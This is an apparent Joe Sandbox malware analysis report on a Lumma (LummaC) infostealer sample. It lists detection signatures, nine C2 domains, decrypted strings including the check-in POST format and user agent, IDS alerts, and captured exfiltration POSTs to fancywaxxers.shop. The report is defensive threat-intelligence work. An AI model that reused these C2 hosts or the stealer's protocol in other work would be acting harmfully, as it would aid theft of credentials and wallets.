Edit tour

Windows Analysis Report
nayfObR.exe

Overview

General Information

Sample name:	nayfObR.exe
Analysis ID:	1583755
MD5:	138fcf999a87419be2c7e5e036601466
SHA1:	7569a1444cd948145c966dbe0b47ffdb587f8681
SHA256:	960aa535a9712242c02a82c1f07530ae60e79bcbab15fcf0ebc6e7dbd636710b
Tags:	exemalwaretrojanuser-Joker
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

nayfObR.exe (PID: 6196 cmdline: "C:\Users\user\Desktop\nayfObR.exe" MD5: 138FCF999A87419BE2C7E5E036601466)

conhost.exe (PID: 5536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

nayfObR.exe (PID: 6540 cmdline: "C:\Users\user\Desktop\nayfObR.exe" MD5: 138FCF999A87419BE2C7E5E036601466)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["fancywaxxers.shop", "cloudewahsj.shop", "framekgirus.shop", "wholersorie.shop", "noisycuttej.shop", "tirepublicerj.shop", "abruptyopsn.shop", "rabidcowse.shop", "nearycrepso.shop"], "Build id": "7tx2jo--516"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
Process Memory Space: nayfObR.exe PID: 6540	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: nayfObR.exe PID: 6540	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: nayfObR.exe PID: 6540	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T14:33:57.665182+0100	2028371	3	Unknown Traffic	192.168.2.5	49704	104.21.32.1	443	TCP
2025-01-03T14:33:58.596355+0100	2028371	3	Unknown Traffic	192.168.2.5	49705	104.21.32.1	443	TCP
2025-01-03T14:33:59.785500+0100	2028371	3	Unknown Traffic	192.168.2.5	49706	104.21.32.1	443	TCP
2025-01-03T14:34:01.112954+0100	2028371	3	Unknown Traffic	192.168.2.5	49707	104.21.32.1	443	TCP
2025-01-03T14:34:02.251726+0100	2028371	3	Unknown Traffic	192.168.2.5	49708	104.21.32.1	443	TCP
2025-01-03T14:34:04.770372+0100	2028371	3	Unknown Traffic	192.168.2.5	49709	104.21.32.1	443	TCP
2025-01-03T14:34:13.270327+0100	2028371	3	Unknown Traffic	192.168.2.5	49710	104.21.32.1	443	TCP
2025-01-03T14:34:15.612275+0100	2028371	3	Unknown Traffic	192.168.2.5	49716	104.21.32.1	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T14:33:58.123850+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49704	104.21.32.1	443	TCP
2025-01-03T14:33:59.081538+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49705	104.21.32.1	443	TCP
2025-01-03T14:34:16.050117+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49716	104.21.32.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T14:33:58.123850+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49704	104.21.32.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T14:33:59.081538+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49705	104.21.32.1	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T14:33:57.665182+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.5	49704	104.21.32.1	443	TCP
2025-01-03T14:33:58.596355+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.5	49705	104.21.32.1	443	TCP
2025-01-03T14:33:59.785500+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.5	49706	104.21.32.1	443	TCP
2025-01-03T14:34:01.112954+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.5	49707	104.21.32.1	443	TCP
2025-01-03T14:34:02.251726+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.5	49708	104.21.32.1	443	TCP
2025-01-03T14:34:04.770372+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.5	49709	104.21.32.1	443	TCP
2025-01-03T14:34:13.270327+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.5	49710	104.21.32.1	443	TCP
2025-01-03T14:34:15.612275+0100	2058657	1	Domain Observed Used for C2 Detected	192.168.2.5	49716	104.21.32.1	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T14:33:57.173114+0100	2058656	1	Domain Observed Used for C2 Detected	192.168.2.5	61487	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T14:34:12.365477+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49709	104.21.32.1	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://fancywaxxers.shop/$	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/apirV	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/Ek	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/Jk	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/apink	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/apiR3oR	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/i	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop:443/apiMicrosoft	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop:443/apis	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/apiok	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/ak	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/api7	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop/apiJ	Avira URL Cloud: Label: malware
Source: https://fancywaxxers.shop:443/api9	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.2031155271.000000000370F000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["fancywaxxers.shop", "cloudewahsj.shop", "framekgirus.shop", "wholersorie.shop", "noisycuttej.shop", "tirepublicerj.shop", "abruptyopsn.shop", "rabidcowse.shop", "nearycrepso.shop"], "Build id": "7tx2jo--516"}

Multi AV Scanner detection for submitted file

Source: nayfObR.exe	Virustotal: Detection: 44%			Perma Link
Source: nayfObR.exe	ReversingLabs: Detection: 39%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.3% probability

Sample uses string decryption to hide its real strings

Source: 00000003.00000002.2225465670.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: cloudewahsj.shop
Source: 00000003.00000002.2225465670.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: rabidcowse.shop
Source: 00000003.00000002.2225465670.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: noisycuttej.shop
Source: 00000003.00000002.2225465670.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: tirepublicerj.shop
Source: 00000003.00000002.2225465670.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: framekgirus.shop
Source: 00000003.00000002.2225465670.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: wholersorie.shop
Source: 00000003.00000002.2225465670.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: abruptyopsn.shop
Source: 00000003.00000002.2225465670.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: nearycrepso.shop
Source: 00000003.00000002.2225465670.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: fancywaxxers.shop
Source: 00000003.00000002.2225465670.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000003.00000002.2225465670.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000003.00000002.2225465670.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000003.00000002.2225465670.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000003.00000002.2225465670.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000003.00000002.2225465670.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: 7tx2jo--516

Source: nayfObR.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49716 version: TLS 1.2

Source: C:\Users\user\Desktop\nayfObR.exe

Directory queried: number of queries: 1001

Source: C:\Users\user\Desktop\nayfObR.exe	Code function: 0_2_005BB099 FindFirstFileExW,FindNextFileW,FindClose,FindClose,		0_2_005BB099
Source: C:\Users\user\Desktop\nayfObR.exe	Code function: 0_2_005BAFE8 FindFirstFileExW,		0_2_005BAFE8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058656 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop) : 192.168.2.5:61487 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49704 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49707 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49708 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49709 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49705 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49706 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49716 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49710 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49709 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49716 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 104.21.32.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: fancywaxxers.shop
Source: Malware configuration extractor	URLs: cloudewahsj.shop
Source: Malware configuration extractor	URLs: framekgirus.shop
Source: Malware configuration extractor	URLs: wholersorie.shop
Source: Malware configuration extractor	URLs: noisycuttej.shop
Source: Malware configuration extractor	URLs: tirepublicerj.shop
Source: Malware configuration extractor	URLs: abruptyopsn.shop
Source: Malware configuration extractor	URLs: rabidcowse.shop
Source: Malware configuration extractor	URLs: nearycrepso.shop

Source: global traffic

TCP traffic: 192.168.2.5:64588 -> 1.1.1.1:53

Source: Joe Sandbox View

IP Address: 104.21.32.1 104.21.32.1

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49716 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 104.21.32.1:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 45Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PL97KM6X4KLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12791Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PDDNHW1VYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15021Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PAI49V4K5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20511Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=I0TGGFGD09V4Z2V8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 952Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6RJDBLF9VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 585960Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: fancywaxxers.shop

Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: fancywaxxers.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop

Source: nayfObR.exe, 00000003.00000003.2076167571.00000000059BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: nayfObR.exe, 00000003.00000003.2076167571.00000000059BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: nayfObR.exe, 00000003.00000003.2101907540.0000000003103000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051055223.0000000003103000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2210129135.0000000003111000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2183544269.0000000003103000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: nayfObR.exe, 00000003.00000003.2076167571.00000000059BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: nayfObR.exe, 00000003.00000003.2076167571.00000000059BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: nayfObR.exe, 00000003.00000003.2076167571.00000000059BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: nayfObR.exe, 00000003.00000003.2076167571.00000000059BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: nayfObR.exe, 00000003.00000003.2076167571.00000000059BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: nayfObR.exe, 00000003.00000003.2076167571.00000000059BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: nayfObR.exe, 00000003.00000003.2076167571.00000000059BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: nayfObR.exe, 00000003.00000003.2076167571.00000000059BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: nayfObR.exe, 00000003.00000003.2076167571.00000000059BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: nayfObR.exe, 00000003.00000003.2051828204.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051894082.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051766985.00000000058EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: nayfObR.exe, 00000003.00000003.2077258778.0000000005940000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: nayfObR.exe, 00000003.00000003.2077258778.0000000005940000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: nayfObR.exe, 00000003.00000003.2051828204.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051894082.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051766985.00000000058EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: nayfObR.exe, 00000003.00000003.2051828204.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051894082.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051766985.00000000058EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: nayfObR.exe, 00000003.00000003.2051828204.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051894082.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051766985.00000000058EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: nayfObR.exe, 00000003.00000003.2077258778.0000000005940000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: nayfObR.exe, 00000003.00000003.2077258778.0000000005940000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: nayfObR.exe, 00000003.00000003.2051828204.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051894082.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051766985.00000000058EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: nayfObR.exe, 00000003.00000003.2051828204.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051894082.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051766985.00000000058EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: nayfObR.exe, 00000003.00000003.2051828204.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051894082.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051766985.00000000058EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: nayfObR.exe, nayfObR.exe, 00000003.00000003.2210391409.00000000030C3000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2183510952.000000000311D000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051055223.00000000030C3000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2210657402.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051055223.00000000030AC000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2102111658.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2183649716.000000000311E000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2183649716.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2223324623.000000000312C000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2194674764.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000002.2226668754.000000000312C000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2075511997.000000000593D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/
Source: nayfObR.exe, 00000003.00000003.2064676852.000000000592D000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2064576733.0000000005928000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/$
Source: nayfObR.exe, 00000003.00000003.2051055223.00000000030BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/Ek
